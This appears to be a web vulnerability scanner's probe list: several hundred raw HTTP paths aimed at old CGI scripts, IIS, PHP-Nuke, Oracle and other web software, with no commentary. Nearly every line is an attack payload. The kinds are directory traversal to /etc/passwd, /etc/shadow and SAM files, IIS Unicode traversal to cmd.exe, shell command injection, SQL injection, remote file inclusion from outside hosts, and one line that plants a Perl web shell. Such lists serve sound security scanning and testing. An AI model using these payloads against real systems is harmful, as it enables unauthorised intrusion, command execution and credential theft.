/phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru(’/bin/ls’)."
/cgi-bin-sdb/
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/siteman000510/siteman.php3
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/search.dll?search?query=%00&logic=AND
m/search.dll?search?query=/&logic=AND
:8002/Newuser?Image=../../database/rbsserv.mdb
/doc/packages/
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
/_private/shopping_cart.mdb
/asp/db/message.mdb
/db/message.mdb
/asp/mail/message.mdb
/mail/message.mdb
/mails/message.mdb
/webmail/message.mdb
/cgi-bin/webdata_test.pl
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/cgi-bin/ssi/cgi-bin/ssi
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc
/scripts/websec.bat/ ..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\
/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../cmd.exe?/c+dir
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%% 35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/Web_Store/web_store.cgi?page=%00
/info.php
/info.php3
/phpinfo.php
/phpinfo.php3
/php/info.php
/php/info.php3
/php/phpinfo.php
/php/phpinfo.php3
/cgi-bin/phpinfo.php
/cgi-bin/phpinfo.php3
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/jsp/../../tst.txt
:8100//WEB-INF/
:8100//WEB-INF/web.xml
:8100//WEB-INF/webapp.properties
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/servlet/ssifilter/../../test.jsp
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/servlet/jsp/../../tst.txt
//WEB-INF/
//WEB-INF/web.xml
//WEB-INF/webapp.properties
/cgi-bin/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/search.pl
/admin/includes/
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bb-replog.sh
/cgi-bin/bb-ack.sh
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/build.cgi
/build.cgi
/forums/list.php
/cgi-bin/html_page?TEMPLATE=main
/default.php%20%20
/default.php3%20%20
/index.php3%20%20
/index.php%20%20
/index.php3?vhosts=http://go.to
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/cgi-bin/db2www.exe/../../db2www.ini
/cgi-bin/db2www/../../db2www.ini
/db2_doc/html/db2srsen.exe
/+/
/+./
/++/
/++./
/includes/config.inc
/includes/config.php
/includes/config.php3
/includes/global.inc
/2600-cgi/ezmlm-cgi
/cgi-bin/ezmlm-cgi
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mmstdol.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mmstdod.pl
/cgi-bin/mmstdol.pl
/mmstdod.cgi
/mmstdod.pl
/mmstdol.cgi
/mmstdol.pl
/."./."./Perl/eg/core/findtar
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
/."./."./winnt/reapir/sam._%20.pl
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/ad.cgi?file=../../../../../../../../etc/hosts
/subscribe.pl
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&[email protected];ls%20-alsi&submit=run
/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&[email protected]
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&[email protected]
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/guestbook/dcguest.cgi
/cgi-bin/guestbook.pl
/cgi-bin/guestbook.data
/cgi-bin/guestbook.config
/cgi-bin/guestbook.cgi
/index.php3.%5c../..%5cconf/httpd.conf
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/submit.php
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/cgi-bin/passcfg
/passcfg
/pls/orasso/orasso.wwsso_app_admin.ls_login
/pls/orasso/
/pls/admin_/?
/pls/admin_/help/..%5Cplsql.conf
/pls/demo/owa_util.signature
/pls/demo/%20owa_util.signature
/pls/demo/%0aowa_util.signature
/pls/demo/%08owa_util.signature
/pls/demo/owa_util.showsource?cname=owa_util
/pls/demo/owa_util.showsource?cname=owa_util
/pls/demo/owa_util.cellsprint?p_theQuery=select+*+from+sys.d ba_users&p_max_rows=10
/pls/demo/owa_util.listprint?p_theQuery=select+*+from+sys.db a_users&p_cname=&p_nsize=
/pls/demo/owa_util.show_query_columns?ctable=sys.dba_users
/Globals.jsa
/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
/xsql/java/xsql/demo/adhocsql/query.xsql?xml-stylesheet=none.xml&sql=select+*+from+sys.dba_users
/soap/servlet/soaprouter
/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/dms0
/dms/DMSDump
/servlet/DMSDump
/servlet/Spy
/soap/servlet/Spy
/dms/AggreSpy
/oprocmgr-status
/oprocmgr-service
/demo/email/sendmail.jsp
/demo/basic/info/info.jsp
/fcgi-bin/echo
/fcgi-bin/echo2
/WebDB/admin_/
/cgi-bin/bsguest.cgi?email=x;ls
/cgi-bin/bslist.cgi?email=x;ls
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
/servlet/FormMailServlet?juhu.txt
/servlet/SurveyXMLServlet?jeaaa.txt
/servlet/WebPopServlet?config=uii.txt
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/webdriver
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/gettext.pl
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/ping.cgi
/cgi-bin/traceroute.cgi
/cgi-bin/finger.cgi
/cgi-bin/whois.cgi
/.nsf/../winnt/win.ini
/.box/../winnt/win.ini
/.ns4/../winnt/win.ini
/.nsf/../lotus/domino/notes.ini
/%00.nsf/../lotus/domino/notes.ini
/cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi
/cgi-bin/debug.pl
/cgi-bin/debug.cgi
/mysql.class
/class/mysql.class
/inc/sendmail.inc
/cgi-bin/statsconfig.pl
/cgi-bin/stats.pl
/deletecontact.php?item_id=100+OR+TRUE+;
/cgi-bin/pi?page=document/show_file&id=
/./WEB-INF/
/./WEB-INF/web.xml
:8000/./WEB-INF/
:8000/./WEB-INF/web.xml
/cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/user_info.php3?user_username=’’+or+admin_level=2+o r+username%3d’x’+and+users.id=access.user_id;%00
/cgi-bin/user_info.php3?user_username=’’+or+admin_level=2+o r+username%3d’x’+and+users.id=access.user_id;%00
/guestserver/guestserver.cgi?email=|ls|[email protected]
/cgi-bin/guestserver.cgi?email=|ls|[email protected]
/cfbin/board.cgi
/cgi-bin/board.cgi
/cgi-bin/getcomments.pl
/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+
/cgi-bin/form-to-mail.cgi?_out_file=mungo.dat&x=y
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
/pals-cgi?palsAction=restart&documentName=pals-cgi
/cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi
/opendir.php?requesturl=/etc/hosts
/ROADS/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/empower?DB=mungowitsch
/cgi-bin/way-board.cgi?db=way-board.cgi%00
/way-board/way-board.cgi?db=way-board.cgi%00
/cgi-bin/webspirs.cgi?sp.nextform=webspirs.cgi
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
/upload.html
/cgi/bin/test.txt;%20/bin/ls
/cgi-bin/test.txt;%20/bin/ls
/isapi/tstisapi.dll
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/cgi-bin/adcycle/adcenter.cgi
/ext.dll
/cgi-bin/mailnews.cgi
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/foldoc/template.cgi?template.cgi
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
/cgi-bin/ikonboard.cgi
/cgi-bin/post-query?
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
/../../winnt/win.ini%00examples/jsp/hello.jsp
:8080/index.js%70
/index.js%70
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
/jsp_test/PoolMan.jsp
/PoolMan.jsp
:8080/.jsp/WEB-INF/classes/Env.java
/.jsp/WEB-INF/classes/Env.java
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/nph-maillist.pl
/content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000
/cgi-bin/processit.pl
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file=ariali.ttf
:6346/........../windows/win.ini
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp.cgi?|/bin/ls|
/%2e%2e/%2e%2e/%2e%2e/scandisk.log
/../scandisk.log
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt
/cgi-bin/sgdynamo.exe?HTNAME=default.htm
/pass?loginpass=a&redirect=0%2F&Submit=Login
/.../.../scandisk.log
/..../scandisk.log
/chip.ini
/ChipCfg.cfg
/ChipCfg
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/hosts%00
:9090//etc/shadow
/interscan/cgi-bin/FtpSave.dll?no
/interscan/cgi-bin/FtpSave.dll?yes
/interscan/cgi-bin/FtpSave.dll?I’m%20here
/cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl
/admin/?op=%c0
:631/admin/?op=%c0
/cgi-bin/ws_mail.cgi?kill=ng
:8000/file/%2E%2E/test1.mp3
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/vpopmail.php
/mail/vpopmail.php
/webmail/vpopmail.php
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
:30001/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
:30001/../../template/shared/indexTemplate.xml
/../../template/shared/indexTemplate.xml
/servlet/com.unify.ewave.servletexec.UploadServlet
/imp/compose.php
/compose.php
/AdLogin.pm
/adcycle/AdLogin.pm
/cgi-bin/story.cgi?next=
/webmacro/Page?db=tst&wmtemplate=ttt
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtemplate=ttt
/mailman/edithtml
/cgi-bin/uncgi
/sbin/nscgi.cfg
/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator
/session/pagecount?page=
:8080/../ssd.ini
/scripts/wsendmail.exe
/cgi-bin/wsendmail.exe
/scripts/toos/mkilog.exe
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell("cmd.exe+/c%20dir");--
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/phpBBfolder/prefs.php?save=1&viewemail=1’*user_level%3D’4’%20where%20username%3 D’hoschi’%23
/phpBB/bb_memberlist.php?sortby=user_regdate
/cgi-bin/mail.cgi
/scripts/mail.cgi
/cgi-bin/mailform.exe
/scripts/mailform.exe
/cgi-bin/mailsend.exe
/scripts/mailsend.exe
/cgi-bin/mailme.exe
/scripts/mailme.exe
/cgi-bin/mailmepro.exe
/scripts/mailmepro.exe
/cgi-bin/MailPost.exe
/scripts/MailPost.exe
/cgi-bin/postie.exe
/cgi-bin/postie.cgi
/scripts/postie.exe
/scripts/postie.cgi
/cgi-bin/formvar.exe
/scripts/formvar.exe
/cgi-bin/blat.exe
/scripts/blat.exe
/cgi-bin/cgimail.exe
/scripts/cgimail.exe
/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/hosts%00&board=tst
/cgi-bin/ncbook/book.cgi?action=default¤t=|ls|&form_tid=996604045&prev=main.html&list_message_index=10
:4096/../../../winnt/repair/sam._
/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini
/ext.dll%00
/cgiWebupdate.exe
/index.php?file=http://xxx&fcmd=ls
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2F etc
/basilix/basilix.php3?username=blah;ls
/basilix/basilix.php?username=blah;ls
/quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
/a%5c.aspx
/web.config
/edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;ls|
/cgi-local/shop.pl/SID=947626980.19094/page=;ls|
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-bin/powerup/r.cgi?FILE=main.html
/cgi-bin/powerup/r.pl?FILE=main.html
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|
/cgi-bin/eshop.pl?seite=;ls|
/cgi-bin/shop.pl?page=xxx
/admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
/images/tmp.txt
/cgi-bin/html_page?TEMPLATE=main
/homebet/homebet.dll?form=menu&option=menu-signin
/homebet/homebet.log
/cgi-bin/console.exe?page_size=
/cgi-bin/cs.exe?action=
/cgi-bin/forma
/run/forma
/cgi-bin/w3mail/login.cgi
/servlet/psoft.hsphere.CP
/tst/psoft.hsphere.CP/tst/?template_name=x
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
/network_query.php?portNum=80&queryType=all&target=127.0.0.1%3Bls+-l&Submit=Do+It
/run.cgi
/cgi-bin/ibillpm.pl
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale=../../config/log.conf%00%5c&chapter=
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD=UserPassword
/cgi-bin/lb5000/search.cgi
/join.cfm
/admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/tmp/dat.dat&newfile=done.php
/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
/modules.php?name=Downloads&d_op=viewdownload&cid=59%20or%20cid=2
/modules.php?name=Members_List&letter=’%20OR%20user_level=’4’/*
/modules/WebMail/mailattach.php
/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1’sql
/modules.php?op=modload&name=Forums&file=viewforum&forum=’%20OR%201=1;--
/modules.php?op=modload&name=Forums&file=reply&forum=1’);--
/modules.php?op=modload&name=Forums&file=newtopic&forum=1’);--
/modules.php?op=modload&name=Forums&file=editpost&forum=1’;--
/modules.php?op=modload&name=Forums&file=attachment&AtchOp=show
/modules.php?name=AvantGo&file=print&sid=textgoesherexxx
/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%23sql_injection
/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT%201*1*aid*1*pwd*1*1*1*1* 1*1*1*1*1*1%20FROM%20nuke_authors%20WHERE%20radmin super=1
/module.php?link=http://anotherhost_file_extension
/global.cnf
/asearch.cnf
/hypermail
/ifx/?LO=../../../../../../../../../etc/hosts
/stronghold-info
/stronghold-status
/cgi-bin/sendpage.pl?message=test";/bin/ls;echo%20"message
/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0
/cgi-sys/PGPMail.pl
/cgi-bin/PGPMail.pl
/Test11.asp
/AspUpload/Samples/Test11.asp
/components/AspUpload/Samples/Test11.asp
/components/AspUpload/Samples/UploadScript11.asp
/components/AspUpload/Samples/DirectoryListing.asp
:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
:10000/net/
:10000/servers/link.cgi/1/init/edit_action.cgi?0+../../../../../../../../../etc/hosts
/cgi-bin/paramtool
/cgi-bin/hwtestio
/a/
/cgi-bin/csvform.pl?file=/bin/ls%00|
/manual.php
/servlet/ServletManager?username=servlet&password=manager
/cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=&mgaction=&H_ShopID=&H_SID=&H_WID=&H_INF=
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+httplist/httplist.jse
/phprocketaddin/?page=../../../../../../../etc/hosts
/cgi-bin/lastlines.cgi
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00
/modules.php?name=Members_List&&sql_debug=1
/modules.php?name=Your_Account&op=userinfo&uname=
/Secure/Local/console/cmhome.htm
/cgi-bin/boozt/admin/index.cgi
/applist.asp
/oetaki/oetaki.cgi
/oetaki/oekakibbs.conf
/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
/data/default_pref
/data/administrator.pref
/data/admin.pref
/data/root.pref
/cgi-bin/ttawebtop.cgi/?action=start&pg=
/wikihome/action/conflict.php?TemplateDir=http://my.host/
/hostingcontroller
/advwebadmin
/cgi-bin/store/agora.cgi?page=hoschi.html
/userinfo.php?uid=33;
/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10
/forum/forumdisplay.php?s=&forumid=
/forums/forumdisplay.php?s=&forumid=
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/fom/fom.cgi?cmd=**********alert(x)</script>&file=1&keywords=x
/scripts/texis.exe/ngohos
/cgi-bin/texis.exe/ngohos
/cgi-bin/texis/hoschiboschi
/globals.jsa
/_pages/
/demo/email/sendmail.jsp
/demo/basic/info/info.jsp
/cgi-bin/auction/auction.pl?action=tst
/cgi-bin/auctiondeluxe/auction.pl?action=tst
/netget?sid=user&msg=300&file=/../../../filename.ext
/ezboard/ezboard.cgi
/ez2000/ezboard.cgi
/ezboard/ezman.cgi
/ez2000/ezman.cgi
/ezboard/ezadmin.cgi
/ez2000/ezadmin.cgi
/scripts/CWMail.exe
/cgi-bin/CWMail.exe
/sips/htdocs/preferences.php
/sips/htdocs/admin/index.php
/user_update.php
/add_user.php
/scripts/gnujsp//
/servlets/gnujsp//
/scripts/webnews.exe
/cgi-bin/webnews.cgi
/cgi-bin/ans.pl?p=../../../../bin/ls|&blah
/ans.pl?p=../../../../bin/ls|&blah
/pforum/edituser.php
:8000/servlet/com.endymion.sake.servlet.mail.MailServlet?
/servlet/com.endymion.sake.servlet.mail.MailServlet?
/mail?
/cgi-bin/gm.cgi
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
/.cobalt/sysManage/../admin/.htaccess
:81/.cobalt/sysManage/../admin/.htaccess
/scripts/webplus.exe
/cgi-bin/webplus.exe
/unix/ALEX/Xerver2.10/
/directory.php?dir=%3Bmore%20/etc/passwd
:8383/cd-cgi/sscd_suncourier.pl
/netutils/nettools.php
/nettools.php
/News/article.php
/File_editor.asp
/Folderactions.asp
/cgi-bin/traceroute.pl
/forum/memberlist.php
/cgi-bin/dcshop.cgi
/scrivi.php
/portal/administration/userman.php
/csSearch.cgi?command=savesetup&setup=`/bin/ls`
/scripts/cs/cssearch.cgi?command=all&setup=`/bin/ls`
/op/cs/cssearch.cgi?command=all&setup=`/bin/ls`
/cgi-script/CSSearch/CSSearch.cgi
/cgi-bin/CSSearch/CSSearch.cgi
/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/
/cgi-bin/wwwi32.exe/[in=c:\\boot.ini]
/scripts/wwwi32.exe/[in=c:\\boot.ini]
/user.php?caselist[mungo.txt][path]=http://www.somehost.cc&command=/bin/ls
/src/options.php
/src/left_main.php
/cgi-win/testcgi.exe?tata=xxxxxuseolstr
/cgi-bin/testcgi.exe?xssstringo
/cgi-win/Pbcgi.exe?tata=xxxxuseolstr
/mail/admin
/emumail.cgi?type=fh%00
:2002/..\..\..\..\..\..\temp\temp.class
/cgi-bin/%2e%2e/abyss.conf
/site/page.html
/site/’+UNION+ALL+SELECT+FileToClob(’/etc/hosts’*’server’)::html*0+FROM+sysusers+WHERE+usern ame+=+USER+--/.html
/sws/admin.html
/cgi-bin/sws/manager.pl?
/wbboard/reply.php
/dm/demarc
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
/cgi-bin/FileSeek.cgi?head=&foot=;id|
/cgi-bin/FileSeek2.cgi
/cgi-bin/environ.pl+%00
:1099/reports/superlongstringxxxaso
/BOADMIN/BACKOFFICE/SERVICES.ASP
/pvote/ch_info.php
/nul..dbm
/approval/ts_app.htm?TSN=123456
/reports/temp/
/members.asp?mode=search&M_NAME=A&initial=1&method=
:8080/examples/servlet/SnoopServlet
:8080/examples/servlet/TroubleShooter
/cgi-script/CSMailto/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/cgi-bin/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/cgi-bin/CSMailto/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/phpprojekt/
/dnstools.php?section=hosts&user_logged_in=true
/dnstools.php?section=security&user_logged_in=true&user_dnstools_administrator=YES
/dostuff.php?action=modify_user
:1500/CONF&LOG=/etc/hosts&NOIH=no&FRAMES=y
/cgi-bin/man.cgi/usr/include;IFS=G;lsG-alsi;|
/cgi-bin/search.cgi?q=query
/cgi-bin/netpad.cgi?proc=open&of=
/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5c\global.asa
/servlet/com.newatlanta.servletexec.JSPServlet/
/phorum/admin/actions/del.php?include_path=http://phonehomedotcom&cmd=ls
/phorum5012/follow.php?forum_id=1&*f00=bar*1=-99_union_stuff
/admin/browse.asp?FilePath=c:\&Opt=2&level=0
/admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=D:\webspace\opendnsserver\target\target.c om\db\..\..\..\..\
/admin/import/imp_rootdir.asp?result=1&www=C:\&ftp=C:\&owwwPath=C:\&oftpPath=C:\
/forum/action.php?action=activation&userid=346&code=356268007
/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
/servlets/org.apache.cocoon.Cocoon
/cocoon/samples/welcome
/cocoon/view-source
/cocoon/status
/cocoon/
:3128/status.htm
:3128/mailbox.htm
/dbaccess.txt :
/include/oci8.php?inc_dir=http://www.atker.com&ext=txt
/include/postgres65.php?inc_dir=http://www.atker.com&ext=txt
/include/mysql.php?inc_dir=http://www.atker.com&ext=txt
/include/mssql7.php?inc_dir=http://www.atker.com&ext=txt
